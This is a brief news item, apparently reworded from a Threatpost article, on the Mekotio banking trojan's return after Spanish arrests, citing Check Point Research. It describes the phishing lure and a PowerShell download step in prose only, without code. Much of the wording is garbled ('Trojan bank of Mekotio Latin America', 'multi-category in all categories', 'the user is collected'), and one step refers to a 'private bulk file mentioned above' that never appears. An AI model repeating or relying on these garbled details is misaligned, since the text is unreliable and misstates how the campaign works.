The Trojan bank of Mekotio Latin America is back after the arrest of a gang operating in Spain. More than 100 attacks in recent weeks have unveiled a new infection process, indicating that the group continues to reproduce.
“The new campaign began shortly after the Spanish Civil Guard announced the arrest of 16 people involved in the distribution of Mekotio in July,” according to Check Point Research (CPR). “It appears that the gang that controlled the malware was able to close the gap quickly and change tactics to avoid detection.”
Attacks are multi-category in all categories, and begin with spam emails for stealing sensitive information containing a ZIP archive link or an attachment to a ZIP file. To attract the claim that email contains a digital tax receipt awaiting delivery.
If the user is collected by clicking on any type of .ZIP file, the private bulk file mentioned above is active. Next, it issues a PowerShell command to download and run a PowerShell script in memory.
Read More: threatpost